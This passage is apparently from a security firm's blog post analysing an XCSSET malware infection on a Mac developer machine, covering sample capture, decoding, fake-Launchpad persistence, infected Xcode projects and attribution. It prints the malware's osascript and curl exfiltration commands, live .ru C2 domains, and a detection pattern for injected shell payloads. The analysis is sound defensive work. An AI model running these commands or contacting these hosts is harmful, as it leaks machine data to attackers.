50%; }\n  .dot-r { background: #FF5F57; }\n  .dot-y { background: #FEBC2E; }\n  .dot-g { background: #28C840; }\n\n  .code-body {\n    padding: 18px 24px;\n    overflow-x: auto;\n  }\n\n  .code-body pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 13px;\n    line-height: 1.6;\n    white-space: pre;\n  }\n\n  .t-cmd  { color: #0F0063; font-weight: 500; }\n  .t-path { color: #00A696; }\n  .t-arg  { color: #FF645A; }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-topbar\">\n      <div class=\"dot dot-r\"><\/div>\n      <div class=\"dot dot-y\"><\/div>\n      <div class=\"dot dot-g\"><\/div>\n    <\/div>\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">osascript<\/span> <span class=\"t-path\">\/tmp\/jl<\/span> <span class=\"t-arg\">&lt;~2KB base64-like argument&gt;<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n\n\n\n<p>And then another. And another.<\/p>\n\n\n\n<p>osascript is Apple&#8217;s built-in interpreter for AppleScript \u2013 a legitimate tool, but not one that should be spawning repeatedly from \/tmp. That directory is for throwaway temp files; no well-behaved application drops executables there. The argument attached to each call was massive and looked encoded.&nbsp;<\/p>\n\n\n\n<p>The processes themselves were short-lived, disappearing almost as fast as they appeared, yet they kept coming back, which meant something was relaunching them on a schedule.<\/p>\n\n\n\n<p>The file at the center of it all, \/tmp\/jl, was even harder to pin down. It existed for only a few milliseconds at a time \u2013 long enough to be executed, gone before it could be read.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"2-%d1%81apturing-the-live-sample\">2. \u0421apturing the live sample<\/h3>\n\n\n\n<p>The fix didn&#8217;t require any specialized tooling. The file was too fast to catch by hand, so instead, a simple polling loop was set to watch for it:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n    <style>\n        .wrap {\n            background: #ffffff;\n            padding: 40px 28px;\n            border-radius: 16px;\n            max-width: 860px;\n            margin: 0 auto;\n            border: 1px solid #e8eaf5;\n        }\n\n        .code-block {\n            background: #fafbff;\n            border: 1px solid #e8eaf5;\n            border-radius: 12px;\n            overflow: hidden;\n        }\n\n        .code-topbar {\n            display: flex;\n            align-items: center;\n            gap: 6px;\n            padding: 10px 16px;\n            background: #f2f4fc;\n            border-bottom: 1px solid #e8eaf5;\n        }\n\n        .dot {\n            width: 10px;\n            height: 10px;\n            border-radius: 50%;\n        }\n        .dot-r {\n            background: #ff5f57;\n        }\n        .dot-y {\n            background: #febc2e;\n        }\n        .dot-g {\n            background: #28c840;\n        }\n\n        .code-body {\n            padding: 18px 24px;\n            overflow-x: auto;\n        }\n\n        .code-body pre {\n            font-family: \"JetBrains Mono\", monospace;\n            font-size: 13px;\n            line-height: 1.6;\n            white-space: pre;\n        }\n\n        .t-kw {\n            color: #a05dd2;\n            font-weight: 500;\n        }\n        .t-cmd {\n            color: #0f0063;\n            font-weight: 500;\n        }\n        .t-path {\n            color: #00a696;\n        }\n        .t-flag {\n            color: #ff645a;\n        }\n        .t-op {\n            color: #8b90b8;\n        }\n    <\/style>\n    <div class=\"wrap\">\n        <div class=\"code-block\">\n            <div class=\"code-topbar\">\n                <div class=\"dot dot-r\"><\/div>\n                <div class=\"dot dot-y\"><\/div>\n                <div class=\"dot dot-g\"><\/div>\n            <\/div>\n            <div class=\"code-body\">\n                <pre><span class=\"t-kw\">while<\/span> <span class=\"t-kw\">true<\/span><span class=\"t-op\">;<\/span> <span class=\"t-kw\">do<\/span> <span class=\"t-op\">[ -f<\/span> <span class=\"t-path\">\/tmp\/jl<\/span> <span class=\"t-op\">]<\/span> <span class=\"t-op\">&amp;&amp;<\/span> <span class=\"t-cmd\">cp<\/span> <span class=\"t-flag\">-f<\/span> <span class=\"t-path\">\/tmp\/jl<\/span> <span class=\"t-path\">\/tmp\/jl.bak<\/span><span class=\"t-op\">;<\/span> <span class=\"t-cmd\">sleep<\/span> <span class=\"t-flag\">0.1<\/span><span class=\"t-op\">;<\/span> <span class=\"t-kw\">done<\/span><\/pre>\n            <\/div>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n\n<p>Every 100 milliseconds, check if \/tmp\/jl exists. If it does, copy it to \/tmp\/jl.bak before it disappears. That&#8217;s it.<\/p>\n\n\n\n<p>Within seconds, the trap worked. The copy landed, and for the first time, the file stayed still long enough to be examined.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"3-analyzing-the-specimen\">3. Analyzing the specimen<\/h3>\n\n\n\n<p>With the copy in hand, the first step was simple identification:<\/p>\n\n\n\n<div>\n<style>\n  .wrap {\n    background: #ffffff;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .code-block {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    overflow: hidden;\n  }\n\n  .code-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 10px 16px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .dot { width: 10px; height: 10px; border-radius: 50%; }\n  .dot-r { background: #FF5F57; }\n  .dot-y { background: #FEBC2E; }\n  .dot-g { background: #28C840; }\n\n  .code-body {\n    padding: 18px 24px;\n    overflow-x: auto;\n  }\n\n  .code-body pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 13px;\n    line-height: 1.6;\n    white-space: pre;\n  }\n\n  .t-cmd  { color: #0F0063; font-weight: 500; }\n  .t-path { color: #00A696; }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-topbar\">\n      <div class=\"dot dot-r\"><\/div>\n      <div class=\"dot dot-y\"><\/div>\n      <div class=\"dot dot-g\"><\/div>\n    <\/div>\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">file<\/span> <span class=\"t-path\">\/tmp\/jl.bak<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n\n\n\n<p>The output: a compiled AppleScript \u2013 binary .scpt format. Not human-readable as-is, but that was expected. What wasn&#8217;t expected was what was layered inside.<\/p>\n\n\n\n<p>The script&#8217;s logic followed a familiar pattern for obfuscated malware: extract a packed payload, base64-decode it, and execute it.&nbsp;<\/p>\n\n\n\n<p>Unpacking those inner base64 blocks revealed a second layer, and this one was doing real work. A shell script, responsible for quietly building a detailed fingerprint of the machine:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Username and locale<\/li>\n\n\n\n<li>macOS version and CPU architecture<\/li>\n\n\n\n<li>SIP (System Integrity Protection) status<\/li>\n\n\n\n<li>Mac serial number<\/li>\n\n\n\n<li>Chrome extension manifests, and the Chrome binary itself, if present<\/li>\n<\/ul>\n\n\n\n<p>Everything gets bundled into a JSON object and shipped out via a single curl call:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    background: #ffffff;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .code-block {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    overflow: hidden;\n  }\n\n  .code-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 10px 16px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .dot { width: 10px; height: 10px; border-radius: 50%; }\n  .dot-r { background: #FF5F57; }\n  .dot-y { background: #FEBC2E; }\n  .dot-g { background: #28C840; }\n\n  .code-body {\n    padding: 18px 24px;\n    overflow-x: auto;\n  }\n\n  .code-body pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 13px;\n    line-height: 1.6;\n    white-space: pre;\n  }\n\n  .t-cmd  { color: #0F0063; font-weight: 500; }\n  .t-flag { color: #FF645A; }\n  .t-num  { color: #8b90b8; }\n  .t-url  { color: #00A696; }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-topbar\">\n      <div class=\"dot dot-r\"><\/div>\n      <div class=\"dot dot-y\"><\/div>\n      <div class=\"dot dot-g\"><\/div>\n    <\/div>\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">curl<\/span> <span class=\"t-flag\">-fksL<\/span> <span class=\"t-flag\">-m<\/span> <span class=\"t-num\">6<\/span> <span class=\"t-url\">https:\/\/riggletoy.ru\/l<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<p>The -k flag tells curl to ignore TLS certificate errors. It&#8217;s a small detail, but a telling one: a well-resourced operation doesn&#8217;t skip TLS validation. This is the signature of a hastily configured C2.<\/p>\n\n\n\n<p>The embedded config made the architecture even clearer: domain: &#8220;riggletoy.ru&#8221;, moduleName: &#8220;lbwbl&#8221;, entryPoint: &#8220;Terminal&#8221;, userLocale: &#8220;en_CY&#8221;.&nbsp;<\/p>\n\n\n\n<p>This wasn&#8217;t a standalone piece of malware \u2013 it was one module inside a larger, modular framework.&nbsp;<\/p>\n\n\n    <div class=\"block__quote\"><p class=\"block__quote_desc\"><p>The domain itself returned nothing in public threat intelligence feeds at the time of discovery. It wasn&#8217;t burned, wasn&#8217;t flagged \u2013 it was quietly operational. <\/p>\n<\/p><\/div>\n    <style>.block__quote {margin: 32px 0;padding-left: 20px;border-left: 3px solid #00B8A7;}.block__quote_desc {font-weight: 700 !important;font-size: 18px !important;line-height: 28px !important;margin-bottom: 24px !important;}.block__quote_author {display: none;}<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"4-locating-the-persistence-mechanism-and-mapping-the-damage\">4. Locating the persistence mechanism and mapping the damage<\/h3>\n\n\n\n<p>Short-lived processes that keep reappearing don&#8217;t restart themselves; something is launching them. The next step was to find it.<\/p>\n\n\n\n<p>The usual suspects were checked one by one: LaunchAgents, LaunchDaemons, git hooks, .zshrc, Dock entries, Xcode toolchains. And there, buried deep in a cache directory, was a counterfeit Launchpad:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n    <style>\n        .wrap {\n            background: #ffffff;\n            padding: 40px 28px;\n            border-radius: 16px;\n            max-width: 860px;\n            margin: 0 auto;\n            border: 1px solid #e8eaf5;\n        }\n\n        .code-block {\n            background: #fafbff;\n            border: 1px solid #e8eaf5;\n            border-radius: 12px;\n            overflow: hidden;\n        }\n\n        .code-topbar {\n            display: flex;\n            align-items: center;\n            gap: 6px;\n            padding: 10px 16px;\n            background: #f2f4fc;\n            border-bottom: 1px solid #e8eaf5;\n        }\n\n        .dot {\n            width: 10px;\n            height: 10px;\n            border-radius: 50%;\n        }\n        .dot-r {\n            background: #ff5f57;\n        }\n        .dot-y {\n            background: #febc2e;\n        }\n        .dot-g {\n            background: #28c840;\n        }\n\n        .code-body {\n            padding: 18px 24px;\n            overflow-x: auto;\n        }\n\n        .code-body pre {\n            font-family: \"JetBrains Mono\", monospace;\n            font-size: 13px;\n            line-height: 1.6;\n            white-space: pre;\n        }\n\n        .t-home {\n            color: #a05dd2;\n            font-weight: 500;\n        }\n        .t-path {\n            color: #00a696;\n        }\n        .t-app {\n            color: #0f0063;\n            font-weight: 500;\n        }\n    <\/style>\n    <div class=\"wrap\">\n        <div class=\"code-block\">\n            <div class=\"code-topbar\">\n                <div class=\"dot dot-r\"><\/div>\n                <div class=\"dot dot-y\"><\/div>\n                <div class=\"dot dot-g\"><\/div>\n            <\/div>\n            <div class=\"code-body\">\n                <pre><span class=\"t-home\">~<\/span><span class=\"t-path\">\/Library\/Caches\/jaq.kuugp.dirzpf\/<\/span><span class=\"t-app\">Launchpad.app<\/span><\/pre>\n            <\/div>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<p>The real Launchpad lives at \/System\/Applications\/Launchpad.app, protected by SIP \u2013 Apple&#8217;s system integrity layer that prevents modification of core system files. Anything calling itself Launchpad.app outside of that path isn&#8217;t Launchpad. The location alone was enough to confirm it.<\/p>\n\n\n\n<p>This is precisely what <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/03\/11\/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft documented in March 2025 as the &#8220;dock method&#8221;<\/a>: plant a fake Launchpad in the user&#8217;s space, then use dockutil to silently rewrite the Dock entry. From that point on, every click on the Dock icon launches two things at once: the real app and the malware. The user sees nothing unusual.<\/p>\n\n\n\n<p>With persistence mapped, one question remained: how many Xcode projects had been touched? A single scan across the home directory answered it:<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    background: #ffffff;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .code-block {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    overflow: hidden;\n  }\n\n  .code-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 10px 16px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .dot { width: 10px; height: 10px; border-radius: 50%; }\n  .dot-r { background: #FF5F57; }\n  .dot-y { background: #FEBC2E; }\n  .dot-g { background: #28C840; }\n\n  .code-body {\n    padding: 18px 24px;\n    overflow-x: auto;\n  }\n\n  .code-body pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 13px;\n    line-height: 1.9;\n    white-space: pre;\n  }\n\n  .t-cmd    { color: #0F0063; font-weight: 500; }\n  .t-flag   { color: #FF645A; }\n  .t-path   { color: #00A696; }\n  .t-home   { color: #A05DD2; font-weight: 500; }\n  .t-string { color: #00A696; }\n  .t-op     { color: #8b90b8; }\n  .t-redir  { color: #b0b5d8; }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"code-block\">\n    <div class=\"code-topbar\">\n      <div class=\"dot dot-r\"><\/div>\n      <div class=\"dot dot-y\"><\/div>\n      <div class=\"dot dot-g\"><\/div>\n    <\/div>\n    <div class=\"code-body\">\n      <pre><span class=\"t-cmd\">find<\/span> <span class=\"t-home\">~<\/span> <span class=\"t-flag\">-path<\/span> <span class=\"t-string\">\"*\/*.xcodeproj\/project.pbxproj\"<\/span> <span class=\"t-op\">\\<\/span>\n  <span class=\"t-flag\">-type f<\/span> <span class=\"t-flag\">-print0<\/span> <span class=\"t-redir\">2>\/dev\/null<\/span> <span class=\"t-op\">| \\<\/span>\n  <span class=\"t-cmd\">xargs<\/span> <span class=\"t-flag\">-0<\/span> <span class=\"t-cmd\">rg<\/span> <span class=\"t-flag\">-l -S<\/span> <span class=\"t-string\">\"(\\|\\s*(sh|bash)\\b|xxd\\s+-p\\s+-r|base64\\s+--decode|>\/dev\/null\\s+2>&amp;1\\s*&amp;)\"<\/span><\/pre>\n    <\/div>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<p>Over 20 projects came back positive. Every single one had been modified at the exact same minute, not roughly the same time, the same minute. That&#8217;s not a user action. That&#8217;s one automated trigger sweeping the entire home directory in a single pass, silently injecting itself into every Xcode project it could reach.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"building-the-protection-mechanisms\">Building the Protection Mechanisms<\/h2>\n\n\n\n<p>A full picture of how the malware worked was valuable: every mechanism XCSSET relied on could now be turned against it. The same behavior that made it dangerous: predictable persistence points, recognizable file patterns, consistent network calls, made it detectable.<\/p>\n\n\n\n<p>The key here isn&#8217;t the sequence of steps \u2013 it&#8217;s the loop.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme.png\"><img decoding=\"async\" width=\"1461\" height=\"1076\" src=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme.png\" alt=\"adex-xcsset-scheme\" class=\"wp-image-5533\" srcset=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme.png 1461w, https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme-300x221.png 300w, https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme-1024x754.png 1024w, https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/adex-xcsset-scheme-768x566.png 768w\" sizes=\"(max-width: 1461px) 100vw, 1461px\" \/><\/a><\/figure>\n\n\n\n<p>Every persistence mechanism has one job: survive. And it does this aggressively. Whenever the opportunity arises: a new shell session, a Dock click, a git operation \u2013 the dropper sweeps the entire home directory and rewrites every Xcode project it can find.&nbsp;<\/p>\n\n\n\n<p>That&#8217;s what makes a single-project cleanup pointless. Remove the injection from one .xcodeproj, reopen Xcode, hit Build, and the next trigger puts it straight back. The infection doesn&#8217;t live in the projects. It lives in the persistence layer.<\/p>\n\n\n\n<p><strong>The only path to clean remediation, in order:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Remove all autostart points<\/strong>: fake Launchpad.app in <strong>~\/Library\/Caches, LaunchAgent and LaunchDaemon<\/strong> entries, the injected line in <strong>~\/.zshrc<\/strong>, global git hooks<\/li>\n\n\n\n<li><strong>Reboot<\/strong><\/li>\n\n\n\n<li><strong>Only then<\/strong> restore Xcode projects from a known-clean git state<\/li>\n<\/ol>\n\n\n\n<p>Microsoft and Loginsoft&#8217;s technical breakdown of the 2025 variant <a href=\"https:\/\/www.loginsoft.com\/post\/xcsset-reloaded-smarter-stealthier-stronger\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">describes the full chain as four stages<\/a>: a malicious build script triggers unpacking, which fetches a second-stage payload from C2, which then loads additional modules on demand.&nbsp;<\/p>\n\n\n\n<p>What&#8217;s actually running on a given machine at a given moment depends entirely on what the C2 decides to deliver.<\/p>\n\n\n<div class=\"block__preview\">\n        <a href=\"https:\/\/adex.com\/blog\/triada-malvertising-case-study\/\" class=\"block__preview_img\"><img src=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2025\/12\/adex-investigarion-triada-infected-campaigns.png\" srcset=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2025\/12\/adex-investigarion-triada-infected-campaigns.png\" sizes=\"100vw\" alt=\"adex-investigation-triada-infected-campaigns\" decoding=\"async\" class=\"lazy\"><\/a>\n    <div class=\"block__preview_box\">\n        <a href=\"https:\/\/adex.com\/blog\/category\/current_risks\/\" class=\"block__preview_box-cat\">Current risks<\/a>        <h3 class=\"block__preview_box-title\" id=\"inside-the-triada-battle-a-five-year-investigation-and-the-security-upgrades-it-triggered\"><a href=\"https:\/\/adex.com\/blog\/triada-malvertising-case-study\/\">Inside the Triada Battle: A Five-Year Investigation and the Security Upgrades It Triggered<\/a><\/h3>\n    <\/div>\n<\/div>\n<style>\n.block__preview {display: flex;align-items: center;justify-content: center; margin: 32px 0;}\n.block__preview a {text-decoration: none;}\n.block__preview_img {min-width: 360px;max-width: 360px;min-height: 188px;width: 100%;height: 100%;}\n.block__preview_img img {width: 100%;height: 100%;}\n.block__preview_box {margin-left: 40px;max-width: 360px;}\n.block__preview_box-cat {color: #00B8A7 !important;font-weight: 600;font-size: 12px;line-height: 16px;text-transform: uppercase; display: block; margin-bottom: 4px;}\n.block__preview_box-cat:hover {color: #FE645A !important; text-decoration: none !important;}\n.block__preview_box-title {font-size: 20px;font-weight: 700;line-height: 24px;color: #0B172D;}\n.block__preview_box-title a {color: #0B172D !important;}\n.block__preview_box-title a:hover {color: #FE645A !important;}\n@media screen and (max-width: 768px) {.block__preview {flex-direction: column;}.block__preview_box {max-width: 100%; margin-top: 32px;margin-left: 0px;}.block__preview_img {max-width: 100%;min-width: 100%;min-height: 100%;}}<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"why-our-sample-is-almost-certainly-xcsset\">Why Our Sample Is Almost Certainly XCSSET<\/h2>\n\n\n\n<p>How can we be certain that our specimen is really XCSSET?<\/p>\n\n\n\n<p>No single indicator is conclusive on its own. An osascript process running from \/tmp could be legitimate developer tooling. A base64-encoded AppleScript could be someone&#8217;s own automation script. A Chrome binary being accessed could be a routine extension manager.<\/p>\n\n\n\n<p>But seven of these indicators appear: behavioral, structural, network, and persistence mechanisms, all matching documented XCSSET patterns \u2013 in the same binary, with the same architecture?&nbsp;<\/p>\n\n\n\n<div class=\"xa-wrap htmlAdexBlock\">\n    <style>\n        .xa-wrap {\n            padding: 60px 20px;\n            font-family:\n                -apple-system, BlinkMacSystemFont, \"Helvetica Neue\", sans-serif;\n            color: #1a1a1a;\n        }\n        .xa-inner {\n            max-width: 900px;\n            margin: 0 auto;\n        }\n        .xa-label {\n            font-size: 11px;\n            font-weight: 600;\n            letter-spacing: 0.12em;\n            text-transform: uppercase;\n            color: #6366f1;\n            margin-bottom: 8px;\n        }\n        .xa-h1 {\n            font-size: 26px;\n            font-weight: 700;\n            letter-spacing: -0.03em;\n            color: #1a1a1a;\n            margin-bottom: 32px;\n            line-height: 1.2;\n        }\n        .xa-wrap code {\n            font-size: 12px;\n            background: #e0e2f7;\n            border-radius: 3px;\n            padding: 1px 5px;\n            color: #3730a3;\n            font-family: \"SF Mono\", \"Fira Mono\", \"Menlo\", monospace;\n        }\n        .xa-conf-card {\n            display: flex;\n            align-items: center;\n            gap: 24px;\n            background: #fff;\n            border: 1.5px solid #c7cdf4;\n            border-radius: 10px;\n            padding: 18px 24px;\n            margin-bottom: 36px;\n            max-width: 560px;\n            box-shadow: 0 2px 12px rgba(99, 102, 241, 0.07);\n        }\n        .xa-conf-score {\n            font-size: 42px;\n            font-weight: 800;\n            letter-spacing: -0.05em;\n            color: #4f46e5;\n            line-height: 1;\n            flex-shrink: 0;\n        }\n        .xa-conf-detail {\n            display: flex;\n            flex-direction: column;\n            gap: 4px;\n        }\n        .xa-conf-title {\n            font-size: 13.5px;\n            font-weight: 600;\n            color: #1a1a1a;\n        }\n        .xa-conf-sub {\n            font-size: 12px;\n            color: #888;\n            line-height: 1.5;\n        }\n        .xa-conf-dots {\n            display: flex;\n            gap: 5px;\n            margin-top: 6px;\n        }\n        .xa-conf-dot {\n            width: 8px;\n            height: 8px;\n            border-radius: 50%;\n            background: #6366f1;\n        }\n        .xa-table-wrap {\n            width: 100%;\n            overflow-x: auto;\n            border: 1.5px solid #c7cdf4;\n            border-radius: 10px;\n            background: #fff;\n            box-shadow: 0 2px 16px rgba(99, 102, 241, 0.07);\n        }\n        .xa-table {\n            width: 100%;\n            border-collapse: collapse;\n            font-size: 13.5px;\n        }\n        .xa-table thead tr {\n            background: #eef0fb;\n            border-bottom: 1.5px solid #c7cdf4;\n        }\n        .xa-table thead th {\n            padding: 12px 18px;\n            text-align: left;\n            font-size: 10px;\n            font-weight: 700;\n            letter-spacing: 0.1em;\n            text-transform: uppercase;\n            color: #6366f1;\n            white-space: nowrap;\n        }\n        .xa-table th:nth-child(1) {\n            width: 36%;\n        }\n        .xa-table th:nth-child(2) {\n            width: 40%;\n        }\n        .xa-table th:nth-child(3) {\n            width: 24%;\n        }\n        .xa-table tbody tr {\n            border-bottom: 1px solid #e8eaf8;\n        }\n        .xa-table tbody tr:last-child {\n            border-bottom: none;\n        }\n        .xa-table tbody tr:hover {\n            background: #f5f6fd;\n        }\n        .xa-table td {\n            padding: 15px 18px;\n            vertical-align: top;\n            line-height: 1.6;\n            color: #333;\n        }\n        .xa-table td.xa-observed {\n            color: #1a1a1a;\n            font-weight: 500;\n        }\n        .xa-table td.xa-described {\n            color: #4a4a4a;\n        }\n        .xa-table td.xa-source {\n            font-size: 12px;\n            color: #888;\n            line-height: 1.8;\n        }\n        .xa-table td.xa-source span {\n            display: block;\n        }\n        .xa-row-num {\n            display: inline-flex;\n            align-items: center;\n            justify-content: center;\n            width: 19px;\n            height: 19px;\n            border-radius: 50%;\n            background: #e0e2f7;\n            color: #4f46e5;\n            font-size: 10px;\n            font-weight: 700;\n            margin-right: 8px;\n            flex-shrink: 0;\n            vertical-align: middle;\n            position: relative;\n            top: -1px;\n        }\n        .xa-footnote {\n            margin-top: 20px;\n            padding: 16px 20px;\n            background: #fff;\n            border: 1.5px solid #c7cdf4;\n            border-radius: 8px;\n            font-size: 12.5px;\n            color: #777;\n            line-height: 1.7;\n            max-width: 740px;\n            box-shadow: 0 2px 12px rgba(99, 102, 241, 0.06);\n        }\n        .xa-footnote strong {\n            color: #555;\n            font-weight: 600;\n        }\n        @media (max-width: 640px) {\n            .xa-h1 {\n                font-size: 21px;\n            }\n            .xa-conf-score {\n                font-size: 32px;\n            }\n            .xa-table td {\n                padding: 12px;\n                font-size: 12.5px;\n            }\n            .xa-table thead th {\n                padding: 10px 12px;\n            }\n            .xa-table th:nth-child(3),\n            .xa-table td.xa-source {\n                display: none;\n            }\n        }\n    <\/style>\n    <div class=\"xa-inner\">\n        <div class=\"xa-label\">Attribution Analysis \u00b7 XCSSET 2025<\/div>\n        <h1 class=\"xa-h1\" id=\"why-our-sample-is-almost-certainly-xcsset-2\">Why Our Sample Is Almost Certainly XCSSET<\/h1>\n        <div class=\"xa-conf-card\">\n            <div class=\"xa-conf-score\">7 \/ 7<\/div>\n            <div class=\"xa-conf-detail\">\n                <div class=\"xa-conf-title\">Independent indicators matched<\/div>\n                <div class=\"xa-conf-sub\">\n                    Each row maps a direct observation against<br \/>peer-reviewed\n                    vendor and threat intelligence reports.\n                <\/div>\n                <div class=\"xa-conf-dots\">\n                    <div class=\"xa-conf-dot\"><\/div>\n                    <div class=\"xa-conf-dot\"><\/div>\n                    <div class=\"xa-conf-dot\"><\/div>\n                    <div class=\"xa-conf-dot\"><\/div>\n                    <div class=\"xa-conf-dot\"><\/div>\n                    <div class=\"xa-conf-dot\"><\/div>\n                    <div class=\"xa-conf-dot\"><\/div>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <div class=\"xa-table-wrap\">\n            <table class=\"xa-table\">\n                <thead>\n                    <tr>\n                        <th>What We Observed<\/th>\n                        <th>What Public Reports Describe<\/th>\n                        <th>Source<\/th>\n                    <\/tr>\n                <\/thead>\n                <tbody>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">1<\/span\n                            ><code>osascript \/tmp\/jl &lt;base64&gt;<\/code>\n                            visible in the live process list\n                        <\/td>\n                        <td class=\"xa-described\">\n                            XCSSET executes encoded AppleScript payloads via\n                            <code>osascript<\/code> directly from\n                            <code>\/tmp<\/code> \u2014 avoiding persistent writes and\n                            evading file-based scanners\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Mar 2025<\/span\n                            ><span>MITRE S0658<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">2<\/span>Compiled\n                            <code>.scpt<\/code> containing internal base64\n                            blocks, decoded at runtime via\n                            <code>base64 --decode<\/code>\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Multi-layer base64 encoding inside compiled\n                            AppleScript has been a deliberate obfuscation\n                            strategy since XCSSET&#8217;s first documented appearance\n                            \u2014 designed to defeat static analysis\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>SentinelOne, 2022<\/span\n                            ><span>Loginsoft, 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">3<\/span>Payload config with\n                            structured fields: <code>domain<\/code>,\n                            <code>moduleName<\/code>, <code>entryPoint<\/code>,\n                            <code>userLocale<\/code>\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Modular architecture with dynamic sub-module loading\n                            controlled by a runtime config. Modules are fetched\n                            and executed based on target machine profile\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Sep 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">4<\/span>Enumeration of\n                            installed Chrome extensions; direct read attempt of\n                            the Chrome binary\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Standard browser-targeting module covers Chrome,\n                            Opera, Brave, and Yandex. The 2025 variant added\n                            Firefox. Primary goal: session hijacking and cookie\n                            theft via extension injection\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Trend Micro, 2021<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">5<\/span>Exfiltration via\n                            <code>curl -fksL<\/code> (TLS verification bypassed)\n                            to a <code>.ru<\/code> domain\n                        <\/td>\n                        <td class=\"xa-described\">\n                            XCSSET has registered clusters of\n                            <code>.ru<\/code> C2 infrastructure since 2022. Known\n                            2025 domains include <code>castlenet.ru<\/code>,\n                            <code>cdnroute.ru<\/code>, <code>adobecdn.ru<\/code>,\n                            and over a dozen others. TLS bypass is consistent\n                            across all known variants\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>SentinelOne, 2022<\/span\n                            ><span>Joshi, 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">6<\/span>Fake\n                            <code>Launchpad.app<\/code> dropped into\n                            <code>~\/Library\/Caches\/<\/code>\n                        <\/td>\n                        <td class=\"xa-described\">\n                            The 